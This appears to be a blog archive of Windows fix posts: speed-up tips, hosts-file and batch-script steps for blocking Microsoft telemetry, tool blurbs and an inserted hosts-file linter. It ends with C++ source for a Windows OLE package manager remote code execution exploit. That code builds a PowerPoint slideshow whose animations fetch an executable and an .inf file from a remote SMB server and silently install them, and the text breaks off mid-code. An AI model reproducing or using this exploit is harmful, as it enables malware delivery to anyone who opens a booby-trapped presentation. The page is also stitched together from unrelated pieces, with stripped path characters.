Category Archives: Fix

Speed Up a Slow Windows PC

Windows PCs don’t have to slow down over time. Whether your PC has gradually become slower or it suddenly ground to a halt a few minutes ago, there could be quite a few reasons for that slowness.

As with all PC issues, don’t be afraid to give your computer a reboot if something’s not working properly. This can fix quite a few problems and is faster than attempting to manually troubleshoot and fix the problem yourself.

Find Resource-Hungry Programs

Your PC is running slow because something is using up those resources. If it’s suddenly running slower, a runaway process might be using 99% of your CPU resources, for example. Or, an application might be experiencing a memory leak and using a large amount of memory, causing your PC to swap to disk. Alternately, an application might be using the disk a lot, causing other applications to slow down when they need to load data from or save it to the disk.

To find out, open the Task Manager. You can right-click your taskbar and select the “Task Manager” option or press Ctrl+Shift+Escape to open it. On Windows 8, 8.1, and 10, the new Task Manager provides an upgraded interface that color-codes applications using a lot of resources. Click the “CPU,” “Memory,” and “Disk” headers to sort the list by the applications using the most resources. If any application is using too many resources, you might want to close it normally — if you can’t, select it here and click “End Task” to force it to close.

Close System Tray Programs

Many applications tend to run in the system tray, or notification area. These applications often launch at startup and stay running in the background but remain hidden behind the up arrow icon at the bottom-right corner of your screen. Click the up arrow icon near the system tray, right-click any applications you don’t need running in the background, and close them to free up resources.

Disable Startup Programs

Better yet, prevent those applications from launching at startup to save memory and CPU cycles, as well as speed up the login process.

On Windows 8, 8.1, and 10, there’s now a startup manager in the Task Manager you can use to manage your startup programs. Right-click the taskbar and select “Task Manager” or press Ctrl+Shift+Escape to launch it. Click over to the Startup tab and disable startup applications you don’t need. Windows will helpfully tell you which applications slow down your startup process the most.

Reduce Animations

Windows uses quite a few animations, and those animations can make your PC seem a bit slower. For example, Windows can minimize and maximize windows instantly if you disable the associated animations.

To disable animations, press Windows Key + X or right-click the Start button and select “System.” Click “Advanced System Settings” on the left and click the “Settings” button under Performance. Choose “Adjust for best performance” under Visual Effects to disable all the animations, or select “Custom” and disable the individual animations you don’t want to see. For example, uncheck “Animate windows when minimizing and maximizing” to disable the minimize and maximize animations.

Lighten Your Web Browser

There’s a good chance you use your web browser a lot, so your web browser may just be a bit slow. It’s a good idea to use as few browser extensions, or add-ons, as possible — those slow down your web browser and cause it to use more memory.

Go into your web browser’s Extensions or Add-ons manager and remove add-ons you don’t need. You should also consider enabling click-to-play plug-ins. Preventing Flash and other content from loading will prevent unimportant Flash content from using CPU time.

Scan for Malware and Adware

There’s also a chance your computer is slow because malicious software is slowing it down and running in the background. This may not be flat-out malware — it may be software that interferes with your web browsing to track it and add additional advertisements, for example.

To be extra safe, scan your computer with an antivirus program. You should also scan it with Malwarebytes, which catches a lot of “potentially unwanted programs” (PUPs) that most antivirus programs tend to ignore. These programs try to sneak onto your computer when you install other software, and you almost certainly don’t want them.

Free Up Disk Space

If your hard drive is almost completely full, your computer may run noticeably slower. You want to leave your computer some room to work on your hard drive. Follow our guide to freeing up space on your Windows PC to free up room. You don’t need any third-party software — just running the Disk Cleanup tool included in Windows can help quite a bit.

Defragment Your Hard Disk

Defragmenting your hard disk actually shouldn’t be necessary on modern versions of Windows. It’ll automatically defragment mechanical hard drives in the background. Solid-state drives don’t really need traditional defragmentation, although modern versions of Windows will “optimize” them — and that’s fine.

You shouldn’t worry about defragmentation most of the time. However, if you do have a mechanical hard drive and you’ve just put a lot of files on the drive — for example, copying a huge database or gigabytes of PC game files — those files might be fragmented because Windows hasn’t gotten around to defragmenting them yet. In this situation, you might want to open the disk defragmenter tool and perform a scan to see if you need to run a manual defrag program.

Uninstall Programs You Don’t Use

Open the Control Panel, find the list of installed programs, and uninstall programs you don’t use and don’t need from your PC. This can help speed your PC up, as those programs might include background processes, autostart entries, system services, context menu entries, and other things that can slow down your PC. It’ll also save room on your hard drive and improve system security — for example, you definitely shouldn’t have Java installed if you’re not using it.

Reset Your PC / Reinstall Windows

If the other tips here didn’t fix your problem, the one timeless solution to fix Windows problems — aside from rebooting your PC, of course — is getting a fresh Windows installation.

On modern versions of Windows — that is, Windows 8, 8.1, and 10 — it’s easier to get a fresh Windows installation than ever. You don’t have to get Windows installation media and reinstall Windows. Instead, you can simply use the “Reset your PC” feature built into Windows to get a new, fresh Windows system. This is similar to reinstalling Windows and will wipe your installed programs and system settings while keeping your files.


If your PC is still using a mechanical hard drive, upgrading to a solid-state drive — or just ensuring your next PC has an SSD — will offer you a dramatic performance improvement, too. In an age where most people won’t notice faster CPUs and graphics processors, solid-state storage will offer the single biggest boost in overall system performance for most people.

Stop all of the telemetry servers – Microsoft Windows 10

Add the following lines below to your [c:\windows\system32\drivers\etc\hosts] file in Windows 10. Make sure you open it from an elevated command prompt so you can save the changes! This will prevent all of the telemetry servers below from resolving so Microsoft Windows 10 will be unable to report your system data back to Microsoft. Take your privacy back!

Thank you,
Jerry (aka. Barnacules)
http://barnnerd.com
http://twitter.barnnerd.com
http://facebook.barnnerd.com
http://instagram.barnnerd.com
============================================
= Lines you need to add to your HOSTS file =
============================================
127.0.0.1       local
0.0.0.0 vortex.data.microsoft.com
0.0.0.0 vortex-win.data.microsoft.com
0.0.0.0 telecommand.telemetry.microsoft.com
0.0.0.0 telecommand.telemetry.microsoft.com.nsatc.net
0.0.0.0 oca.telemetry.microsoft.com
0.0.0.0 oca.telemetry.microsoft.com.nsatc.net
0.0.0.0 sqm.telemetry.microsoft.com
0.0.0.0 sqm.telemetry.microsoft.com.nsatc.net
0.0.0.0 watson.telemetry.microsoft.com
0.0.0.0 watson.telemetry.microsoft.com.nsatc.net
0.0.0.0 redir.metaservices.microsoft.com
0.0.0.0 choice.microsoft.com
0.0.0.0 choice.microsoft.com.nsatc.net
0.0.0.0 df.telemetry.microsoft.com
0.0.0.0 reports.wes.df.telemetry.microsoft.com
0.0.0.0 wes.df.telemetry.microsoft.com
0.0.0.0 services.wes.df.telemetry.microsoft.com
0.0.0.0 sqm.df.telemetry.microsoft.com
0.0.0.0 telemetry.microsoft.com
0.0.0.0 watson.ppe.telemetry.microsoft.com
0.0.0.0 telemetry.appex.bing.net
0.0.0.0 telemetry.urs.microsoft.com
0.0.0.0 telemetry.appex.bing.net:443
0.0.0.0 settings-sandbox.data.microsoft.com
0.0.0.0 vortex-sandbox.data.microsoft.com
0.0.0.0 survey.watson.microsoft.com
0.0.0.0 watson.live.com
0.0.0.0 watson.microsoft.com
0.0.0.0 statsfe2.ws.microsoft.com
0.0.0.0 corpext.msitadfs.glbdns2.microsoft.com
0.0.0.0 compatexchange.cloudapp.net
0.0.0.0 cs1.wpc.v0cdn.net
0.0.0.0 a-0001.a-msedge.net
0.0.0.0 statsfe2.update.microsoft.com.akadns.net
0.0.0.0 sls.update.microsoft.com.akadns.net
0.0.0.0 fe2.update.microsoft.com.akadns.net
0.0.0.0 65.55.108.23
0.0.0.0 65.39.117.230
0.0.0.0 23.218.212.69
0.0.0.0 134.170.30.202
0.0.0.0 137.116.81.24
0.0.0.0 diagnostics.support.microsoft.com
0.0.0.0 corp.sts.microsoft.com
0.0.0.0 statsfe1.ws.microsoft.com
0.0.0.0 pre.footprintpredict.com
0.0.0.0 204.79.197.200
0.0.0.0 23.218.212.69
0.0.0.0 i1.services.social.microsoft.com
0.0.0.0 i1.services.social.microsoft.com.nsatc.net
0.0.0.0 feedback.windows.com
0.0.0.0 feedback.microsoft-hohm.com
0.0.0.0 feedback.search.microsoft.com


For a guide on how to disable several telemetry options already, visit this website:
http://arstechnica.com/information-technology/2015/08/windows-10-doesnt-offer-much-privacy-by-default-heres-how-to-fix-it/
Another resource is available at:
https://fix10.isleaked.com/
Certain Windows updates in Windows 10 deliver extra “options” for telemetry on your machine. It is advisable to uninstall them:
http://www.kernelmode.info/forum/viewtopic.php?f=11&t=4001
For additional privacy, you can add these entries to your hosts file, which is located in:
C:\Windows\system32\drivers\etc
You can edit and save the file by opening Notepad as Administrator (Press Windows key (“flag” icon), in the search bar enter “notepad”, right-click on notepad and choose Run as Administrator – then browse to the hosts file location).
Note: this does NOT block any Windows Updates.
Copy and paste the following below all the other text in there, save the file. That’s all:
#Microsoft telemetry
127.0.0.1 vortex.data.microsoft.com
127.0.0.1 vortex-win.data.microsoft.com
127.0.0.1 telecommand.telemetry.microsoft.com
127.0.0.1 telecommand.telemetry.microsoft.com.nsatc.net
127.0.0.1 oca.telemetry.microsoft.com
127.0.0.1 oca.telemetry.microsoft.com.nsatc.net
127.0.0.1 sqm.telemetry.microsoft.com
127.0.0.1 sqm.telemetry.microsoft.com.nsatc.net
127.0.0.1 watson.telemetry.microsoft.com
127.0.0.1 watson.telemetry.microsoft.com.nsatc.net
127.0.0.1 redir.metaservices.microsoft.com
127.0.0.1 choice.microsoft.com
127.0.0.1 choice.microsoft.com.nsatc.net
127.0.0.1 df.telemetry.microsoft.com
127.0.0.1 reports.wes.df.telemetry.microsoft.com
127.0.0.1 wes.df.telemetry.microsoft.com
127.0.0.1 services.wes.df.telemetry.microsoft.com
127.0.0.1 sqm.df.telemetry.microsoft.com
127.0.0.1 telemetry.microsoft.com
127.0.0.1 watson.ppe.telemetry.microsoft.com
127.0.0.1 telemetry.appex.bing.net
127.0.0.1 telemetry.urs.microsoft.com
127.0.0.1 telemetry.appex.bing.net:443
127.0.0.1 settings-sandbox.data.microsoft.com
127.0.0.1 vortex-sandbox.data.microsoft.com
127.0.0.1 survey.watson.microsoft.com
127.0.0.1 watson.live.com
127.0.0.1 watson.microsoft.com
127.0.0.1 statsfe2.ws.microsoft.com
127.0.0.1 corpext.msitadfs.glbdns2.microsoft.com
127.0.0.1 compatexchange.cloudapp.net
127.0.0.1 cs1.wpc.v0cdn.net
127.0.0.1 a-0001.a-msedge.net
127.0.0.1 65.55.108.23
127.0.0.1 65.39.117.230
127.0.0.1 23.218.212.69
127.0.0.1 134.170.30.202
127.0.0.1 137.116.81.24
127.0.0.1 diagnostics.support.microsoft.com
127.0.0.1 corp.sts.microsoft.com
127.0.0.1 statsfe1.ws.microsoft.com
127.0.0.1 pre.footprintpredict.com
127.0.0.1 204.79.197.200
127.0.0.1 23.218.212.69
127.0.0.1 i1.services.social.microsoft.com
127.0.0.1 i1.services.social.microsoft.com.nsatc.net
127.0.0.1 feedback.windows.com
127.0.0.1 feedback.microsoft-hohm.com
127.0.0.1 feedback.search.microsoft.com
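
A check for the two lists above, added here as an example and not part of either original post: the hosts file only maps names to addresses, so an entry whose name column is an IP literal or carries a port suffix never matches a lookup and blocks nothing. The sample lines are copied from this page; `lint_hosts` and its finding codes are names chosen for this example.

```python
import ipaddress
import re

# Sample lines copied from the two hosts lists on this page (not a full file).
SAMPLE_HOSTS = """\
127.0.0.1       local
0.0.0.0 vortex.data.microsoft.com
0.0.0.0 telemetry.appex.bing.net
0.0.0.0 telemetry.appex.bing.net:443
0.0.0.0 65.55.108.23
0.0.0.0 23.218.212.69
0.0.0.0 23.218.212.69
127.0.0.1 vortex.data.microsoft.com
#Microsoft telemetry
"""

# One DNS-style label: letters, digits, '_' and inner '-', at most 63 chars.
_LABEL = r"[a-z0-9_](?:[a-z0-9_-]{0,61}[a-z0-9_])?"
HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$)(?:{_LABEL}\.)*{_LABEL}$", re.I)


def is_ip(text):
    """True if text parses as an IPv4 or IPv6 literal."""
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def lint_hosts(text):
    """Lint hosts-file text.

    Returns (findings, effective):
      findings  - list of (line_no, code, detail) for entries that cannot work
                  as intended
      effective - dict of lowercased name -> (address, line_no) for the first
                  well-formed mapping seen for each name
    """
    findings = []
    effective = {}
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        address, names = fields[0], fields[1:]
        if not is_ip(address):
            findings.append((line_no, "bad-address", address))
            continue
        if not names:
            findings.append((line_no, "no-name", address))
            continue
        for name in names:
            key = name.lower()
            if is_ip(key):
                # Connections made straight to an IP never consult the hosts
                # file, so this line has no effect on traffic to that address.
                findings.append((line_no, "ip-as-name", name))
            elif ":" in key or "/" in key:
                # Hosts entries have no port or URL syntax; the literal string
                # "name:443" is never what a resolver is asked for.
                findings.append((line_no, "port-or-url", name))
            elif not HOSTNAME_RE.match(key):
                findings.append((line_no, "bad-name", name))
            elif key in effective:
                prev_addr, prev_line = effective[key]
                code = "duplicate" if prev_addr == address else "conflict"
                findings.append(
                    (line_no, code, f"{name} (first seen on line {prev_line})")
                )
            else:
                effective[key] = (address, line_no)
    return findings, effective


if __name__ == "__main__":
    found, mapped = lint_hosts(SAMPLE_HOSTS)
    for line_no, code, detail in found:
        print(f"line {line_no}: {code}: {detail}")
    print(f"{len(mapped)} names carry a usable mapping")
```

Traffic to the bare IP addresses in the lists has to be handled by a route or firewall rule instead, which is what Step 2 of the batch script further down does.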

Micro$oft Spy removal

Below is the list of “updates” that are delivered by Windows Update as “telemetry and customer experience improvements”. If you don’t want to upgrade to Win10 or send your “telemetry” to MS – remove them and do not install again.
Microsoft claims this is “telemetry” and customer experience blah-blah-blah. Well I call this simple – spyware.
https://support.microsoft.com/en-us/kb/3021917 – “Performance tracker update”
https://support.microsoft.com/en-us/kb/3035583 – “Get Windows 10 App” (delivers ready to use UAC backdoor as bonus)
https://support.microsoft.com/en-us/kb/2990214 – “Upgrade to Windows 10”
https://support.microsoft.com/en-us/kb/3044374 – “Upgrade to Windows 10”
https://support.microsoft.com/en-us/kb/2952664 – “Compatibility update for upgrading Windows 7”
https://support.microsoft.com/en-us/kb/3022345 – “Customer experience and diagnostic telemetry”
https://support.microsoft.com/en-us/kb/3068708 – “Customer experience and diagnostic telemetry”
https://support.microsoft.com/en-us/kb/3080149 – “Customer experience and diagnostic telemetry”
https://support.microsoft.com/en-us/kb/3075249 – “Telemetry points to consent.exe” !!!WARNING!!! this update adds spyware functionality to UAC
COPY/PASTE the script below the line into your command shell/command line (cmd.exe) to disable the evil spying services spread by Microsoft.

================================================================================================================

 

@echo off
echo.
echo Step 1: Delete Updates...
echo Delete KB3075249 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3075249
echo Delete KB3080149 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3080149
echo Delete KB3021917 (telemetry for Win7)
start /w wusa.exe /uninstall /kb:3021917
echo Delete KB3022345 (telemetry)
start /w wusa.exe /uninstall /kb:3022345
echo Delete KB3068708 (telemetry)
start /w wusa.exe /uninstall /kb:3068708
echo Delete KB3044374 (Get Windows 10 for Win8.1)
start /w wusa.exe /uninstall /kb:3044374
echo Delete KB3035583 (Get Windows 10 for Win7sp1/8.1)
start /w wusa.exe /uninstall /kb:3035583
echo Delete KB2990214 (Get Windows 10 for Win7 without sp1)
start /w wusa.exe /uninstall /kb:2990214
echo Delete KB2990214 (Get Windows 10 for Win7)
start /w wusa.exe /uninstall /kb:2990214
echo Delete KB2952664 (Get Windows 10 assistant)
start /w wusa.exe /uninstall /kb:2952664
echo Delete KB3075853 (update for "Windows Update" on Win8.1/Server 2012R2)
start /w wusa.exe /uninstall /kb:3075853
echo Delete KB3065987 (update for "Windows Update" on Win7/Server 2008R2)
start /w wusa.exe /uninstall /kb:3065987
echo Delete KB3050265 (update for "Windows Update" on Win7)
start /w wusa.exe /uninstall /kb:3050265
echo Delete KB971033  (license validation)
start /w wusa.exe /uninstall /kb:971033
echo Delete KB2902907 (description not available)
start /w wusa.exe /uninstall /kb:2902907
echo Delete KB2976987 (description not available)
start /w wusa.exe /uninstall /kb:2976987
echo Step 2: Blocking Routes...
route -p add 23.218.212.69 MASK 255.255.255.255 0.0.0.0
route -p add 65.55.108.23 MASK 255.255.255.255 0.0.0.0
route -p add 65.39.117.230 MASK 255.255.255.255 0.0.0.0
route -p add 134.170.30.202 MASK 255.255.255.255 0.0.0.0
route -p add 137.116.81.24 MASK 255.255.255.255 0.0.0.0
route -p add 204.79.197.200 MASK 255.255.255.255 0.0.0.0
route -p add 23.218.212.69 MASK 255.255.255.255 0.0.0.0
echo Step 3: Disabling tasks...
schtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /DISABLE
schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\ActivateWindowsSearch" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\ConfigureInternetTimeService" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\DispatchRecoveryTasks" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\ehDRMInit" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\InstallPlayReady" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\mcupdate" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\MediaCenterRecoveryTask" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\ObjectStoreRecoveryTask" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\OCURActivate" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\OCURDiscovery" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\PBDADiscovery" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\PBDADiscoveryW1" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\PBDADiscoveryW2" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\PvrRecoveryTask" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\PvrScheduleTask" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\RegisterSearch" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\ReindexSearchRoot" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\SqlLiteRecoveryTask" /DISABLE
schtasks /Change /TN "Microsoft\Windows\Media Center\UpdateRecordPath" /DISABLE
echo Step 4: Killing Diagtrack-service (if it still exists)...
sc stop Diagtrack
sc delete Diagtrack
echo Final Step: Stop remoteregistry-service (if it still exists)...
sc config remoteregistry start= disabled
sc stop remoteregistry
echo All done, go to reboot!

pause

Process Explorer v16.05

 


Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.

The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you’ll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you’ll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.

The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work.

Best recovery CD

Hiren’s BootCD

Hiren’s BootCD is pretty legendary, and anyone who’s ever worked in support or systems administration has probably used it at least once (or has several versions of it lying around still.) The rescue disc is aimed squarely at repairing Windows systems, and includes a wealth of tools to that effect, including antivirus tools to scan your hard drive, anti-malware utilities to clean out spyware and adware, even rootkit detection tools. Hiren’s BootCD can also help you repair, adjust, or re-flash your system’s BIOS or wipe your CMOS, clean out temporary files and folders, securely erase files, back up your data to another hard drive or to the network, update and back up hardware drivers, scan your system for hardware failures, repair lost or damaged partitions, and much much more. We’re only scratching the surface here. It’s completely free and always has been. Even if there are other tools in your toolkit, Hiren’s BootCD should be among them.

 

The Trinity Rescue Kit

The Trinity Rescue Kit is a customized Linux distribution that’s designed specifically for troubleshooting and reviving ailing systems, whether you’re running Windows or Linux. It fits nicely on a CD (or a USB stick if you prefer) and once booted gives you tools to reset lost Windows passwords, scan hard drives for viruses and malware, clone drives, recover lost partitions, even open up the drives as network shares so you can get files off of them and to other computers on your network. It’s completely free, although a donation to the developer behind it is always appreciated and keeps the project alive.

Windows NT 6.X OLE package manager remote code execution through MS Office Powerpoint XYZ slideshow (ppts, pptxs).

    /*++
    Title:
    Windows NT 6.X OLE package manager remote code execution through
    MS Office Powerpoint XYZ slideshow (ppts, pptxs).

    EID:
    00000217:2013/06/10

    Description:
    Undocumented features exist in Windows NT 6 OLE package manager.
    These features allow to bypass ‘Safe download’ mechanism from
    untrusted sources and to execute imm. The IContextMenu i-face
    is used by 3-rd party software (such as MS Office Powerpoint XYZ)
    to unpack and dispatch package data. Shell action to be applied
    to package is specified by action id in ‘cmd’ parameter of slide
    xml-based document. Action Id ‘-1’ and ‘-2’ are reserved by MS
    Office Powerpoint engine. Currently, silent ‘.inf’ installation
    is used for mitigation bypass. The MS Office for Windows XP
    contains internal OLE Package interpreter, so Windows XP doesn’t
    affected.
    Hi F-5ecure and E5et! We are offering you to patch holes and
    backdoors in your fucking AV-s. We know about them.

    Discovered:
    2013/06/06

    --*/

    #include <Windows.h>
    #include <OleAuto.h>
    #include <stdio.h>
    #include <OAIdl.h>
    #include <string>
    #include <shldisp.h>
    #include <tlhelp32.h>
    #include <assert.h>

    using namespace std;

    #define MAKE_OFFICE_IMPORT 0

    #if MAKE_OFFICE_IMPORT
    #import “z:Program Files (x86)Common Filesmicrosoft sharedVBAVBA6VBE6EXT.OLB”
    #import “z:Program Files (x86)Common Filesmicrosoft sharedOFFICE12mso.dll”
    #import “z:Program Files (x86)Microsoft OfficeOffice12msppt.olb”

    /* Modify office headers after import.
    In file vbe6ext.tlh specify:
    #include “mso.tlh”
    using namespace Office;

    In file msppt.tlh specify:
    #include “vbe6ext.tlh”
    using namespace VBIDE;
    */

    #else

    #if _DEBUG

    #include “Debugmso.tlh”
    #include “Debugvbe6ext.tlh”
    #include “Debugmsppt.tlh”

    #else

    #include “Releasemso.tlh”
    #include “Releasevbe6ext.tlh”
    #include “Releasemsppt.tlh”

    #endif

    #endif

    /* Processor definitions
    */
    static HRESULT __G_hresult = S_OK;

    #define CHK_HR( hr ) do { if (FAILED(__G_hresult = (hr))) { goto _Done; } } while(0)

    #define CHK_ALLOC( ptr ) do { if ((ptr) == NULL) {goto _Done; } } while(0)

    #define SAFE_RELEASE_BY_REF( obj ) do { if((*obj) != NULL) { (*obj )->Release(); *obj = NULL;} } while(0)

    #define SAFE_FREE_BSTR_BY_REF( obj ) do { if((*obj) != NULL) { SysFreeString((*obj)); (*obj) = NULL;} } while(0)

    #define VariantInitAsLong( var, val)
    VariantInit( &(var) );
    (var).vt = VT_I4;
    (var).lVal = val;

    /*************************************************************************
    Rtns definition
    *************************************************************************/
    int wmain(int argc, wchar_t **argv);
    bool change_file_time(__in wchar_t *fname);
    void print_usage_and_exit(__in wchar_t *exe);
    bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp);
    bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave);
    bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2);
    bool rewrite_embeddings_in_presentation(__in wchar_t *fnamePpt, __in wchar_t *fnameData);
    bool parse_cmd(int argc, wchar_t **argv, wstring *fnamePptIn, wstring *smbPath, wstring *fnameExe,wstring *fnameExeOnSmb,wstring *fnameInfOnSmb, bool *bForceUpload);

    /*************************************************************************
    Rtns implementation
    *************************************************************************/
    bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp) {

    wstring stdWstrFileSaveAs;
    PowerPoint::PpSaveAsFileType saveAsType;
    bool bres = false,
    bDoesHaveOlePackages = false;
    CLSID appClsid = { 0 };
    BSTR bstrApplicationProgId = NULL,
    bstrPresentationPath = NULL,
    bstrSaveAs = NULL;
    PowerPoint::_Application *pApplication = NULL;
    PowerPoint::Presentations *pPresentations = NULL;
    PowerPoint::_Presentation *pPresentation = NULL;
    PowerPoint::Slides *pSlides = NULL;
    PowerPoint::_Slide *pSlide = NULL;
    PowerPoint::Shapes *pShapes = NULL;
    PowerPoint::Shape *pShape0 = NULL,
    *pShape1 = NULL,
    *pShapeCurr = NULL;
    PowerPoint::TimeLine *pTimeLine = NULL;
    PowerPoint::Sequences *pSequences = NULL;
    PowerPoint::Sequence *pSequence = NULL;
    PowerPoint::Effect *pEffect = NULL;
    PowerPoint::AnimationBehaviors *pAnimationBehaviors = NULL;
    PowerPoint::AnimationBehavior *pAnimationBehavior = NULL;
    PowerPoint::CommandEffect *pCommandEffect = NULL;
    PowerPoint::SlideShowTransition *pSlideShowTransition = NULL;
    VARIANT varSlideIndex;

    /* Produce file name for saving
    */
    stdWstrFileSaveAs.append(fnameSaveAs);

    saveAsType = PowerPoint::PpSaveAsFileType::ppSaveAsOpenXMLShow;

    CHK_ALLOC( bstrApplicationProgId = SysAllocString(L”Powerpoint.Application”));

    /* Obtain POwerPoint App CLSID from PowerPoint App Identifier
    */
    CHK_HR( CLSIDFromProgID( bstrApplicationProgId, &appClsid) );

    /* Create instance of POWERPOINT Application
    */
    CHK_HR( CoCreateInstance(
    appClsid,
    NULL,
    CLSCTX_LOCAL_SERVER,
    __uuidof(PowerPoint::_Application),
    (LPVOID*)&pApplication) );

    /* Get presentation collection
    */
    CHK_HR( pApplication ->get_Presentations(&pPresentations) );

    /* Open presentation
    */
    CHK_ALLOC( bstrPresentationPath = SysAllocString(fname) );

    CHK_HR( pPresentations ->raw_Open(
    bstrPresentationPath,
    Office::MsoTriState::msoFalse,
    Office::MsoTriState::msoFalse,
    Office::MsoTriState::msoFalse,
    &pPresentation) );

    /* Make sure that presentation doesn’t have a lot of ole packages
    */
    if (!presentation_does_have_ole_packages(pPresentation, &bDoesHaveOlePackages)) {

    CHK_HR( E_ABORT );
    }

    if (bDoesHaveOlePackages) {

    printf(“[-] ERROR: Specified presentation already includes OLE objects or no slides found.n”);

    CHK_HR( E_ABORT );
    }

    /* Get collection of slides
    */

    CHK_HR( pPresentation ->get_Slides( &pSlides) );

    /* Get first slide by index
    */
    VariantInitAsLong(varSlideIndex, 1);

    CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );

    /* Get collection of shapes in slide
    */
    CHK_HR( pSlide ->get_Shapes( &pShapes) );

    /* Add 1-th shape to slide as first OLE object
    */
    CHK_HR( pShapes ->raw_AddOLEObject(
    100.0, -100.0, 30.0, 30.0,
    _bstr_t(L””),
    _bstr_t(fname1Tmp),
    Office::MsoTriState::msoFalse,
    _bstr_t(L””),
    0,
    _bstr_t(L””),
    Office::MsoTriState::msoFalse,
    &pShape0
    ) );

    /* Add 2-th shape to slide as second OLE object
    */
    CHK_HR( pShapes ->raw_AddOLEObject(
    150.0, -100.0, 30.0, 30.0,
    _bstr_t(L””),
    _bstr_t(fname2Tmp),
    Office::MsoTriState::msoFalse,
    _bstr_t(L””),
    0,
    _bstr_t(L””),
    Office::MsoTriState::msoFalse,
    &pShape1
    ) );

    /* Configure slide timing
    */
    CHK_HR( pSlide ->get_TimeLine( &pTimeLine ) );

    /* Obtain Main Sequence for timeLine of slide
    */
    CHK_HR( pTimeLine ->get_MainSequence( &pSequence) );

    /* Produce first effect for 1-th shape.
    1-th shape specifies OLE Object which just copies .exe payload
    from remote SMB server and stores in temporary file.
    Specify command verb as ‘-3’ which tells to ShellApi do nothing.
    Effect with id 1 loads slide background.
    Effect with id 2 loads exe stub from remote server.
    */
    {
    CHK_HR( pSequence ->raw_AddEffect(
    pShape0,
    PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
    PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
    PowerPoint::MsoAnimTriggerType::msoAnimTriggerWithPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
    1,
    &pEffect) );

    SAFE_RELEASE_BY_REF( &pEffect );

    CHK_HR( pSequence ->raw_AddEffect(
    pShape0,
    PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
    PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
    PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
    2,
    &pEffect) );

    CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );

    CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );

    CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );

    CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );

    CHK_HR( pCommandEffect ->put_Command( _bstr_t(L”-3″)) );
    }

    /* Release resources assigned with Shape0
    */
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape0 );

    /* Produce first effect for 2-th shape.
    2-th shape specifies OLE Object which simple copies .inf file
    from remote SMB server and stores in temporary file with .inf extension.
    Specify command verb as ‘3’ which tells to ShellApi do ‘Install’ action.
    Effect with id 3 loads .inf from remote server and start it.
    */
    {
    CHK_HR( pSequence ->raw_AddEffect(
    pShape1,
    PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
